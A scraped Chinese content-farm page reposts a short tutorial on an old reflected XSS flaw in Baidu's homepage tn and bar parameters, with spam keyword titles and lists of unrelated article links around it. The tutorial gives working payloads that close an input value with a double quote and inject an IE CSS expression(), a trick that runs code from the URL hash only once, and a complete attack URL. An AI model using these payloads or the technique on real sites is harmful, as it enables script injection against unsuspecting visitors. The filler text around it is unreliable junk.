当前位置: 首页 > news >正文

广西建设厅官方网站电话网络推广公司优化客

广西建设厅官方网站电话,网络推广公司优化客,数据库网站,做网站页面拿百度主页曾经的一个XSS做个演示#xff0c;这个漏洞是由于百度主页tn和bar参数过滤不严导致的参数型XSS#xff1a;http://www.baidu.com/index.php?tn/**/stylexss:expression(alert(‘xss‘)); http://www.baidu.com/index.php?bar/**/stylexss:expressio…拿百度主页曾经的一个XSS做个演示这个漏洞是由于百度主页tn和bar参数过滤不严导致的参数型XSShttp://www.baidu.com/index.php?tn/**/stylexss:expression(alert(‘xss‘));  http://www.baidu.com/index.php?bar/**/stylexss:expression(alert(‘xss‘));  tn和bar两个参数对应在页面的输出是两个input表单值可以使用”(双引号)闭合表单值加入CSS属性跨站页面具体输出如下input typehidden nametn value/**/stylexss:expression(alert(‘xss‘));  这个漏洞只能在IE下使用FIREFOX会把URL链接参数中的”(双引号)转成编码%22,页面参数的输出也会变成%22,就不能闭合”(双引号)跨站。expression()是个不听话的角色这里可以用一个小技巧来去掉expression烦人的死循环。运行当前URL的#注释符后的代码  eval(unescape(location.hash.substr(1)))  给window对象的方法定义一个值判断这个值运行一次代码  (window.r!1)?eval(‘window.r1;eval(unescape(location.hash.substr(1)))‘):1  最后得到完美的攻击链接  http://www.baidu.com/index.php?bar/**/stylexss:expression((window.r!1)?eval(‘window.r1;eval(unescape(location.hash.substr(1)))‘):1);#alert%28%29  转载于:https://www.cnblogs.com/itchong/p/abcd9.html
http://www.pierceye.com/news/913163/

相关文章:

  • 织梦网站打开慢企业咨询师资格证
  • 蓬莱网站建设哪家好广州白云网站建设
  • 网站建设得花多少钱做购物网站能否生存
  • 多语言网站 用什么cms深圳Wordpress网站
  • 常州市建设工程质量监督站网站开发公司设计管理岗位述职
  • 国外网站顶部菜单设计谷歌seo文章
  • 梅州网站开发外国自适应企业网站
  • 大型网站建设动力无限哪个公司的装饰设计公司
  • 网站建设与管理自考wordpress替换默认的编辑器
  • 企业在网站推广咸阳做网站开发公司
  • 从美洲开始做皇帝免费阅读网站wordpress嵌入优酷视频播放
  • 长沙 外贸网站建设国际足联世界排名
  • 辽宁省建设执业继续教育协会网站深圳网站制作建设服务公司
  • 个人网站备案都需要什么运营seo是什么意思
  • 局域网内部网站建设app下载苏州网络推广企业
  • 重庆美邦 网站建设保定最新消息发布
  • 东莞手机建网站旅游网站 分析
  • 网站seo优化技术入门做网站怎样实现网上支付
  • 陕西西安网站建设公司源码编程器
  • 网站开发的前端技术有哪些软件制作是什么专业
  • 淘宝网站建设目标是什么意思厦门seo计费
  • 高端网站建设注意简述网络营销的基本方法
  • html5网站开发实例教程沈阳软件定制开发公司
  • 做透水砖的网站下载爱南宁乘车
  • 免费建设工程信息网站许昌市建设路小学网站
  • 网站建设公司华网天如何设置自己的网址
  • 株洲做网站那家好黑龙江网站设计
  • 培训视频网站百度权重划分等级
  • 重庆江北区网站建设怎么查询网站建设时间
  • 做网站一个月能挣多少怎么做营销推广